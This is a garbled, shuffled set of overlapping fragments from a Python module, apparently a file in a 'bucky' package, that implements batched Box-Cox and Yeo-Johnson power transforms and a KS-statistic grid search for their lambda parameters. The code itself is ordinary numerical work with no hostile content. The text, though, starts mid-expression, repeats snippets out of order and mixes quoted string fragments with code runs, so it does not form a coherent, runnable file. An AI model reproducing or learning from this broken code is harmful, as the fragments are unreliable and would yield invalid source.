zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) **", "\"\"\"Simple power transformation classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp #", "in xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y, lam) else: yp, _,", "yp, _ = yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam) ys", "param # if axis is None: # a = xp.ravel(a) # axis =", "lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1),", "xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1),", "ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks", "store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1,", "normally distributed result.\"\"\" # TODO currently this just minimizes the KS-stat, # would", "currently this just minimizes the KS-stat, # would might better to used shapiro-wilk", "1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] =", "= -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def", "= y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] =", "y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret,", "y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member", "used shapiro-wilk or 'normaltest' but we'd need a batched version y_in = xp.atleast_2d(y)", "1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 /", "\"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson:", "0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0)", "= xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0", "None] y = 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint:", "= xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask]", "ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks", "zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] =", "distributed result.\"\"\" # TODO currently this just minimizes the KS-stat, # would might", "lam) else: yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf", "= 0 axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam,", "using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class", "boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using the fitted", "(1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution", "0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in >= 0.0 zero_mask", "add axis param # if axis is None: # a = xp.ravel(a) #", "- lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0", "version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam =", "= xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask]", "__init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit", "= xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask =", "or 'normaltest' but we'd need a batched version y_in = xp.atleast_2d(y) batch_size =", "* xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0]", "** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask]", "two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched", "+ 1.0) ** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask]", "def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO", "(best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self,", "storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the batched 1d variables in", "two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in >= 0.0 zero_mask =", "self.lam1 = None def fit(self, y): \"\"\"Fit the batched 1d variables in y,", "= boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp,", "y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size)", "def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x - mu[:,", "None]) return ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\"", "storage.\"\"\" self.lam1 = None self.lam2 = None def fit(self, y): \"\"\"Fit the batched", "xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] =", "= xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y,", "= xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 /", "self.lam2 = None def fit(self, y): \"\"\"Fit the batched 1d variables in y,", "1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1),", "class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init", "classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp # TODO this could", "= 0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y", "0.5 * xp.special.erfc(-t / (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y >", "= xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks <", "the most normally distributed result.\"\"\" # TODO currently this just minimizes the KS-stat,", "xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y, lam)", "def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform using", "None def fit(self, y): \"\"\"Fit the batched 1d variables in y, store the", "lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return", "# pylint: disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y,", "tranform, batched in the first dimension.\"\"\" # TODO add axis param # if", "= None self.lam2 = None def fit(self, y): \"\"\"Fit the batched 1d variables", "(2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) +", "4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in >=", "(1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) &", "if axis is None: # a = xp.ravel(a) # axis = 0 axis", "ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4)", "two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] *", "** (1.0 / (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask)", "ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask]", "batched.\"\"\" t = x - mu[:, None] y = 0.5 * xp.special.erfc(-t /", "pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] -", "the batched 1d variables in y, store the lambdas for the inv transform.\"\"\"", "\"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam,", "y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class", "1.0] = 1.0 return y @sync_numerical_libs def fit_lam(y, yj=False, lam_range=(-2, 2, 0.1)): \"\"\"Fit", "ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) -", "search, taking the the most normally distributed result.\"\"\" # TODO currently this just", "Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam,", "1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True) ret", "def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in", "= -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None):", "<filename>bucky/util/power_transforms.py \"\"\"Simple power transformation classes.\"\"\" # pylint: disable=unused-variable from ..numerical_libs import sync_numerical_libs, xp", "import sync_numerical_libs, xp # TODO this could be better organized... @sync_numerical_libs def yeojohnson(y,", "for the inv transform.\"\"\" ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y,", "def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64)", "batched in the first dimension.\"\"\" # TODO add axis param # if axis", "zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) *", "xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if yj: yp, _", "- 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask)", "minimizes the KS-stat, # would might better to used shapiro-wilk or 'normaltest' but", "best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox", "xp # TODO this could be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson", "in y, store the lambdas for the inv transform.\"\"\" ks = fit_lam(y, yj=False)", "self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ):", "taking the the most normally distributed result.\"\"\" # TODO currently this just minimizes", "= ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam)", "1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask]) + 1.0 return ret @sync_numerical_libs", "'normaltest' but we'd need a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0]", "transform using grid search, taking the the most normally distributed result.\"\"\" # TODO", "= y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None],", "2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask =", "in the first dimension.\"\"\" # TODO add axis param # if axis is", "pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) -", "/ (sigma[:, None] * xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0", "# TODO this could be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform,", "mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x - mu[:, None] y", "axis=axis, keepdims=True) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] =", "two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform,", "& zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask])", "pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) **", "- lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0", "else: yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf =", "+ lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask]", "\"\"\"Fit the batched 1d variables in y, store the lambdas for the inv", "norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask] =", "TODO add axis param # if axis is None: # a = xp.ravel(a)", "a power transform using grid search, taking the the most normally distributed result.\"\"\"", "== 0.0 two_mask = xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in >= 0.0", "axis=1) ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam return", "(y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 - xp.min(y_in, axis=axis, keepdims=True)", "dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask", "- 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is", "xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) **", "+ 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0)", "== 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] * y_in[~zero_mask] +", "= y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1),", "lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1,", "axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask] = lam", "= xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0", "yp, _, _ = boxcox(y_in, lam) ys = xp.sort(yp, axis=1) cdf = xp.cumsum(ys,", "the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4)", "is None: # a = xp.ravel(a) # axis = 0 axis = y.ndim", "best_ks = xp.full(batch_size, xp.inf) best_ks_lam = xp.empty(batch_size) for lam in xp.around(xp.arange(*lam_range), 6): if", "/ lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF,", "1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask &", "return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched", "need a batched version y_in = xp.atleast_2d(y) batch_size = y_in.shape[0] best_ks = xp.full(batch_size,", "= boxcox(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse tranform using the", "batched 1d variables in y, store the lambdas for the inv transform.\"\"\" ks", "& zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask] = ((1.0 - y_in[~pos_mask])", "yj=True) ret, self.lam1 = yeojohnson(y, ks[1][:, None]) return ret def inv(self, y): \"\"\"Inverse", "\"\"\"Normal distribution CDF, batched.\"\"\" t = x - mu[:, None] y = 0.5", "lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if lam2 is None: lam2 = 1.0 -", "(1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) -", "axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf -", "xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask]", "- norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask]", "axis param # if axis is None: # a = xp.ravel(a) # axis", "ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] -", "return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a Box-Cox transformer.\"\"\" def __init__(", "def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_yeojohnson(y, self.lam1)", "zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] =", "1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) &", "ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][...,", "xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) /", "def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y):", "1.0) / lam1[pos_mask] ret[pos_mask & zero_mask] = xp.log(y_in[pos_mask & zero_mask] + 1.0) ret[~pos_mask]", "y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x,", "for lam in xp.around(xp.arange(*lam_range), 6): if yj: yp, _ = yeojohnson(y, lam) else:", "the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret =", "lambda values.\"\"\" return inv_boxcox(y, self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson", "fit(self, y): \"\"\"Fit the batched 1d variables in y, store the lambdas for", "lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) ==", "return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched", "ks = fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret", "yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self, y):", "= ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0) / lam1[pos_mask] ret[pos_mask & zero_mask]", "lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0", "two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] +", "fit_lam(y, yj=False) ret, self.lam1, self.lam2 = boxcox(y, ks[1][:, None]) return ret def inv(self,", "xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None],", "lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in the", "# would might better to used shapiro-wilk or 'normaltest' but we'd need a", "& zero_mask]) - 1.0 ret[~pos_mask] = -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0)", "self.lam1 = None self.lam2 = None def fit(self, y): \"\"\"Fit the batched 1d", "lam, lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO add axis", "= -(((lam1[~pos_mask] - 2.0) * y_in[~pos_mask] + 1.0) ** (1.0 / (2.0 -", "= xp.around(xp.ravel(lam1), 4) == 2.0 pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:,", "the KS-stat, # would might better to used shapiro-wilk or 'normaltest' but we'd", "# if axis is None: # a = xp.ravel(a) # axis = 0", "@sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the first dimension.\"\"\" y_in", "- 1.0) / lam1[~zero_mask] return ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2):", "of a power transform using grid search, taking the the most normally distributed", "ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x -", "lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson tranform, batched in the", "2, 0.1)): \"\"\"Fit lambda of a power transform using grid search, taking the", "lam1 = xp.broadcast_to(lam1, pos_mask.shape) ret[pos_mask] = ((y_in[pos_mask] + 1.0) ** lam1[pos_mask] - 1.0)", "/ (2.0 - lam1[~pos_mask]))) + 1.0 ret[(~pos_mask) & two_mask] = -xp.exp(-y_in[(~pos_mask) & two_mask])", "= (lam1[~zero_mask] * y_in[~zero_mask] + 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return", "axis=1), xp.var(yp, axis=1))), axis=1) ks_mask = ks < best_ks best_ks[ks_mask] = ks[ks_mask] best_ks_lam[ks_mask]", "lam2=None): \"\"\"Box-Cox tranform, batched in the first dimension.\"\"\" # TODO add axis param", "from ..numerical_libs import sync_numerical_libs, xp # TODO this could be better organized... @sync_numerical_libs", "in the first dimension.\"\"\" y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret", "lam_range=(-2, 2, 0.1)): \"\"\"Fit lambda of a power transform using grid search, taking", "xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.exp(y_in[zero_mask]) - lam2[zero_mask] ret[~zero_mask] = (lam1[~zero_mask] *", "lambda of a power transform using grid search, taking the the most normally", "& two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret, lam1[:, 0][..., None]", "** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask & zero_mask] = xp.exp(y_in[pos_mask & zero_mask])", "xp.around(xp.ravel(lam1), 4) == 0.0 ret[zero_mask] = xp.log(y_in[zero_mask] + lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] +", "for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 =", "= xp.sort(yp, axis=1) cdf = xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks =", "= xp.cumsum(ys, axis=1) / xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp,", "..numerical_libs import sync_numerical_libs, xp # TODO this could be better organized... @sync_numerical_libs def", "(lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return", "6): if yj: yp, _ = yeojohnson(y, lam) else: yp, _, _ =", "tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape) zero_mask", "ret, lam1, lam2 @sync_numerical_libs def inv_boxcox(y, lam1, lam2): \"\"\"Inverse Box-Cox tranform, batched in", "- 2.0) ret[(~pos_mask) & two_mask] = -xp.log(1.0 - y_in[(~pos_mask) & two_mask]) return ret,", "return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t = x", "xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) ret = xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask", "# a = xp.ravel(a) # axis = 0 axis = y.ndim - 1", "lam2[~zero_mask] return ret def norm_cdf(x, mu, sigma): \"\"\"Normal distribution CDF, batched.\"\"\" t =", "_ = yeojohnson(y, lam) else: yp, _, _ = boxcox(y_in, lam) ys =", "first dimension.\"\"\" # TODO add axis param # if axis is None: #", "better to used shapiro-wilk or 'normaltest' but we'd need a batched version y_in", "0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:, None], pos_mask.shape) lam1 =", "lam2[zero_mask]) ret[~zero_mask] = ((y_in[~zero_mask] + lam2[~zero_mask]) ** lam1[~zero_mask] - 1.0) / lam1[~zero_mask] return", "ret def inv(self, y): \"\"\"Inverse tranform using the fitted lambda values.\"\"\" return inv_yeojohnson(y,", "& two_mask]) return ret, lam1[:, 0][..., None] @sync_numerical_libs def inv_yeojohnson(y, lam): \"\"\"Inverse Yeo-Johnson", "Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) ret = xp.empty(y.shape)", "keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask =", "class for a Box-Cox transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1", "= xp.ravel(a) # axis = 0 axis = y.ndim - 1 y_in =", "1.0 return ret @sync_numerical_libs def boxcox(y, lam, lam2=None): \"\"\"Box-Cox tranform, batched in the", "self.lam1, self.lam2) class YeoJohnson: \"\"\"Wrapper class for a Yeo-Johnson transformer.\"\"\" def __init__( self,", "this could be better organized... @sync_numerical_libs def yeojohnson(y, lam): \"\"\"Yeo-Johnson tranform, batched in", "= xp.empty(y.shape) zero_mask = xp.around(xp.ravel(lam1), 4) == 0.0 two_mask = xp.around(xp.ravel(lam1), 4) ==", "class for a Yeo-Johnson transformer.\"\"\" def __init__( self, ): \"\"\"Init lambda storage.\"\"\" self.lam1", "self, ): \"\"\"Init lambda storage.\"\"\" self.lam1 = None def fit(self, y): \"\"\"Fit the", "= (lam1[pos_mask] * y_in[pos_mask] + 1.0) ** (1.0 / lam1[pos_mask]) - 1.0 ret[pos_mask", "xp.sum(yp, axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1)", "would might better to used shapiro-wilk or 'normaltest' but we'd need a batched", "= ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] -", "axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64)", "0 axis = y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0],", "* xp.sqrt(2.0))) # pylint: disable=no-member y[y > 1.0] = 1.0 return y @sync_numerical_libs", "to used shapiro-wilk or 'normaltest' but we'd need a batched version y_in =", "= y.ndim - 1 y_in = y.astype(xp.float64) lam1 = xp.broadcast_to(lam, (y_in.shape[0], 1)).astype(xp.float64) if", "ks[ks_mask] best_ks_lam[ks_mask] = lam return (best_ks, best_ks_lam) class BoxCox: \"\"\"Wrapper class for a", "y): \"\"\"Fit the batched 1d variables in y, store the lambdas for the", "pos_mask = y_in >= 0.0 zero_mask = xp.broadcast_to(zero_mask[:, None], pos_mask.shape) two_mask = xp.broadcast_to(two_mask[:,", "(2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask] - 2.0) ret[(~pos_mask) & two_mask] =", "ret[~pos_mask] = ((1.0 - y_in[~pos_mask]) ** (2.0 - lam1[~pos_mask]) - 1.0) / (lam1[~pos_mask]", "def fit(self, y): \"\"\"Fit the batched 1d variables in y, store the lambdas", "+ 1.0) ** (1.0 / lam1[~zero_mask]) - lam2[~zero_mask] return ret def norm_cdf(x, mu,", "axis=1, keepdims=True) ks = xp.max(xp.abs(cdf - norm_cdf(ys, xp.mean(yp, axis=1), xp.var(yp, axis=1))), axis=1) ks_mask", "\"\"\"Inverse Box-Cox tranform, batched in the first dimension.\"\"\" y_in = y.astype(xp.float64) 